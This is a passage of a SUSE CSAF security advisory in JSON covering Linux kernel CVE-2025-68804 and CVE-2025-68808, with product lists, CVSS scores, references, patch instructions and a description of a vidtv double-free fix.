"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
